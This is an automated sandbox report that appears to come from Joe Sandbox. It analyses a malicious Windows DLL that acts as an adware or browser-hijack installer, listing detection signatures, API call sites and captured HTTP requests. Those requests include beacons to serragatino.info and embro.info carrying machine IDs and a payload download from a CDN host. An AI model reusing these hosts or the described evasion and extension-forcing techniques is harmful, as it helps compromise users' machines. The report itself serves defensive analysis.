Windows Analysis Report
anuwhqTXGt.dll

Overview

General Information

Sample name: anuwhqTXGt.dll
Renamed because the original name is a hash value
Original sample name: 5321973ACCEA8905112E90EA77809091187252D2126ADB7F056E69A3CD1C83D3
Analysis ID: 1430161
MD5: 136233d478f9a3a8a809fc91ae7b9fa3
SHA1: 47693171dff1319486b413d384951293268d47ad
SHA256: 5321973accea8905112e90ea77809091187252d2126adb7f056e69a3cd1c83d3

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Changes security center settings (notifications, updates, antivirus, firewall)
Modifies Chrome's extension installation force list
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Uses cmd line tools excessively to alter registry or file data
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to create an SMB header
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Modifies existing windows services
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes

Classification

AV Detection

Source: serragatino.info Virustotal: Detection: 9%
Source: embro.info Virustotal: Detection: 9%
Source: https://embro.info/installer/get_timestamp.php1023 Virustotal: Detection: 9%
Source: https://embro.info/ Virustotal: Detection: 10%
Source: https://embro.info/installer/finish Virustotal: Detection: 10%
Source: https://embro.info/installer/get_timestamp.php Virustotal: Detection: 9%
Source: anuwhqTXGt.dll Virustotal: Detection: 11%
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD977DF30 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam, 33_2_0000021BD977DF30
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD977EA80 CryptDestroyHash, 33_2_0000021BD977EA80
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97D3090 CryptCreateHash, 33_2_0000021BD97D3090
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97CD5E8 CryptReleaseContext,_CxxThrowException, 33_2_0000021BD97CD5E8
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9779640 CryptReleaseContext, 33_2_0000021BD9779640
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F2DF30 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam, 34_2_00000166D8F2DF30
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F83090 CryptCreateHash, 34_2_00000166D8F83090
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F29640 CryptReleaseContext, 34_2_00000166D8F29640
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F7D5E8 CryptReleaseContext,_CxxThrowException, 34_2_00000166D8F7D5E8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F2EA80 CryptDestroyHash, 34_2_00000166D8F2EA80
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85347A0 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam, 39_2_000001C9C85347A0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85B1420 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 39_2_000001C9C85B1420
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C853B778 CryptReleaseContext, 39_2_000001C9C853B778
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85B2B90 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 39_2_000001C9C85B2B90
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85DCC06 CryptReleaseContext,_CxxThrowException, 39_2_000001C9C85DCC06
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85AE150 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 39_2_000001C9C85AE150
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85346E0 CryptDestroyHash, 39_2_000001C9C85346E0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85B19A0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 39_2_000001C9C85B19A0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85B1950 CryptAcquireContextA,CryptCreateHash, 39_2_000001C9C85B1950
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85B1A30 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 39_2_000001C9C85B1A30
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85AE019 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 39_2_000001C9C85AE019
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85ADFC0 CryptAcquireContextA,CryptCreateHash, 39_2_000001C9C85ADFC0
Source: C:\Windows\System32\rundll32.exe Code function: mov dword ptr [r14+04h], 424D53FFh 39_2_000001C9C859CE00
Source: anuwhqTXGt.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknown HTTPS traffic detected: 172.67.207.72:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.207.72:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.207.72:443 -> 192.168.2.7:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.207.72:443 -> 192.168.2.7:49741 version: TLS 1.2
Source: anuwhqTXGt.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: d:\Projects\Visual Studio\NSIS Plugins\IpConfig\Output\Unicode\Plugins\IpConfig.pdb source: IpConfig.dll.15.dr, IpConfig.dll.6.dr, IpConfig.dll.7.dr
Source: Binary string: d:\Projects\Visual Studio\NSIS Plugins\IpConfig\Output\Unicode\Plugins\IpConfig.pdb$ source: IpConfig.dll.15.dr, IpConfig.dll.6.dr, IpConfig.dll.7.dr
Source: Binary string: t:\untgz\MoreInfo\SRC\Release\MoreInfo.pdb source: MoreInfo.dll.7.dr, MoreInfo.dll.15.dr, MoreInfo.dll.6.dr
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A4C6B lstrcpynW,FindFirstFileW, 6_2_046A4C6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A30A4 FindFirstFileW,FindClose, 6_2_046A30A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A2367 DeleteFileW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,lstrcpynW,FindNextFileW,FindClose, 6_2_046A2367
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C548A FindFirstFileExW, 6_2_046C548A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B3A83 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 6_2_046B3A83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E4C6B lstrcpynW,FindFirstFileW, 7_2_045E4C6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E30A4 FindFirstFileW,FindClose, 7_2_045E30A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E2367 DeleteFileW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,lstrcpynW,FindNextFileW,FindClose, 7_2_045E2367
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0460548A FindFirstFileExW, 7_2_0460548A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045F3A83 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 7_2_045F3A83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03452367 DeleteFileW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,lstrcpynW,FindNextFileW,FindClose, 15_2_03452367
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_034530A4 FindFirstFileW,FindClose, 15_2_034530A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03454C6B lstrcpynW,FindFirstFileW, 15_2_03454C6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03463A83 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 15_2_03463A83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0347548A FindFirstFileExW, 15_2_0347548A
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD943F81C FindFirstFileExA, 33_2_0000021BD943F81C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D885F81C FindFirstFileExA, 34_2_00000166D885F81C
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66F0510 FindFirstFileExW, 39_2_000001C9C66F0510
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85CAC90 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_wfullpath,_errno,_errno,_errno,_wfullpath,IsRootUNCName,GetDriveTypeW,free,__loctotime64_t,free,_wsopen_s,_fstat64,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,__loctotime64_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,__loctotime64_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,__loctotime64_t,FindClose,__wdtoxmode,GetLastError,_dosmaperr,FindClose,GetLastError,_dosmaperr,FindClose, 39_2_000001C9C85CAC90

Networking

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 172.67.207.72 443
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 138.199.40.58 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 104.21.24.192 80
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8556D44 InternetCheckConnectionA,WaitForSingleObject,Sleep,WaitForSingleObject, 39_2_000001C9C8556D44
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start&v=1.28.763.1&ts=1713854395&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start&v=1.28.763.1&ts=1713854396&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start_download&v=1.28.763.1&ts=1713854396&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start_download&v=1.28.763.1&ts=1713854396&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /license_1.28.763.1.dat HTTP/1.1Host: 4o985rhikfsof.b-cdn.net
Source: global traffic HTTP traffic detected: GET /license_1.28.763.1.dat HTTP/1.1Host: 4o985rhikfsof.b-cdn.net
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=end_download&v=1.28.763.1&ts=1713854398&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start&v=1.28.763.1&ts=1713854398&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start_download&v=1.28.763.1&ts=1713854399&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start_install&v=1.28.763.1&ts=1713854399&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /license_1.28.763.1.dat HTTP/1.1Host: 4o985rhikfsof.b-cdn.net
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=end_download&v=1.28.763.1&ts=1713854399&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start_install&v=1.28.763.1&ts=1713854400&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=end_download&v=1.28.763.1&ts=1713854401&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start_install&v=1.28.763.1&ts=1713854401&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=end_install&v=1.28.763.1&ts=1713854414&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=end_install&v=1.28.763.1&ts=1713854416&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=end_install&v=1.28.763.1&ts=1713854417&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: Joe Sandbox View IP Address: 138.199.40.58
Source: Joe Sandbox View IP Address: 168.61.215.74
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /updateTask/index.php?v=e1.0.0.28&os_mj=10&os_mn=0&os_bitness=64&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=VPGCNBK0FG&ts=1713854404&ts2=&brw=chrome&retry_version=1.0.0.28&retry_count=0 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: embro.infoConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 168.61.215.74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B1FA8 getaddrinfo,socket,connect,freeaddrinfo,WSACreateEvent,WSASend,WSAGetLastError,WSAWaitForMultipleEvents,WSACreateEvent,closesocket,closesocket,closesocket,WSARecv,WSAGetLastError,WSAWaitForMultipleEvents,WSAGetLastError,WSAGetOverlappedResult,WSAResetEvent,WSACloseEvent,WSACloseEvent,WSACloseEvent,closesocket,WSACleanup,closesocket,WSACleanup, 6_2_046B1FA8
Source: global traffic HTTP traffic detected: GET /installer/get_timestamp.php HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer/get_timestamp.php HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer/start?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=none&ts=1713854402&ts2=&brw=chrome&mi=0&ma=10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer/start?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=none&ts=1713854403&ts2=&brw=chrome&mi=0&ma=10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer/get_timestamp.php HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer/start?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=VPGCNBK0FG&ts=1713854404&ts2=&brw=chrome&mi=0&ma=10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer.php?pixid=2&campaignId=&firstrun=1&bg=1&cmdline=C%3A%5CUsers%5Cuser%5CDesktop%5CanuwhqTXGt%2Edll%2Cget&v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=none&ts=1713854403&ts2=&brw=chrome&mi=0&ma=10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer/finish?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=none&ts=1713854403&ts2=&brw=chrome&mi=0&ma=10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer.php?pixid=2&campaignId=&firstrun=1&bg=1&cmdline=%22C%3A%5CUsers%5Cuser%5CDesktop%5CanuwhqTXGt%2Edll%22%2C%231&v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=none&ts=1713854402&ts2=&brw=chrome&mi=0&ma=10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer/finish?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=VPGCNBK0FG&ts=1713854404&ts2=&brw=chrome&mi=0&ma=10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer/finish?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=none&ts=1713854402&ts2=&brw=chrome&mi=0&ma=10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: serragatino.info
Source: rundll32.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: rundll32.exe, 00000006.00000003.1531203206.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532379164.00000000046A0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315274555.0000000002E16000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1315956231.0000000002CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1508009358.00000000045E0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1506478813.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1344950440.0000000003226000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1528772926.0000000003269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529625959.0000000003450000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: rundll32.exe, 00000006.00000002.1533185168.0000000004DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1509281947.0000000005C4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1530276294.00000000053AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: svchost.exe, 0000000B.00000002.3167579094.000001D989118000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.3166699441.000001D988887000.00000004.00000020.00020000.00000000.sdmp, regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.11.dr String found in binary or memory: http://standards.iso.org/iso/19770/-2/2009/schema.xsd
Source: svchost.exe, 00000000.00000002.1446167098.0000026B78213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: rundll32.exe, 00000006.00000003.1531203206.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532289168.0000000002E99000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1507666527.0000000002D69000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1506478813.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1528772926.0000000003269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529469355.00000000032A9000.00000004.00000020.00020000.00000000.sdmp, c23a32abd836342a70b7f6c1aa74947e.2.E.6.dr, c23a32abd836342a70b7f6c1aa74947e.2.6.dr String found in binary or memory: http://www.google.com/update2/response
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: rundll32.exe, rundll32.exe, 00000027.00000002.1446783379.000001C9C8530000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000027.00000003.1427149075.000001C9C841A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000003.1463086671.0000022638E17000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000002.1464421881.0000022638F20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000002F.00000003.1463181477.000001A89316C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002F.00000002.1464566083.000001A893280000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000030.00000002.1465060549.00000265DD1F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000030.00000003.1463196912.00000265DD0E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: rundll32.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: rundll32.exe, rundll32.exe, 00000027.00000002.1446783379.000001C9C8530000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000027.00000003.1427149075.000001C9C841A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000003.1463086671.0000022638E17000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000002.1464421881.0000022638F20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000002F.00000003.1463181477.000001A89316C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002F.00000002.1464566083.000001A893280000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000030.00000002.1465060549.00000265DD1F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000030.00000003.1463196912.00000265DD0E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: rundll32.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: rundll32.exe, rundll32.exe, 00000027.00000002.1446783379.000001C9C8530000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000027.00000003.1427149075.000001C9C841A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000003.1463086671.0000022638E17000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000002.1464421881.0000022638F20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000002F.00000003.1463181477.000001A89316C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002F.00000002.1464566083.000001A893280000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000030.00000002.1465060549.00000265DD1F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000030.00000003.1463196912.00000265DD0E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: rundll32.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000000.00000003.1428375584.0000026B78266000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1425857973.0000026B7825A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1446313458.0000026B78242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428442083.0000026B78284000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1427452911.0000026B78241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1427443653.0000026B78282000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1446424516.0000026B78263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418425282.0000026B78262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000000.00000002.1446627199.0000026B78285000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428442083.0000026B78284000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1427443653.0000026B78282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000000.00000002.1446453851.0000026B78268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418388349.0000026B78267000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000000.00000003.1417764385.0000026B78286000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1446652719.0000026B78288000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
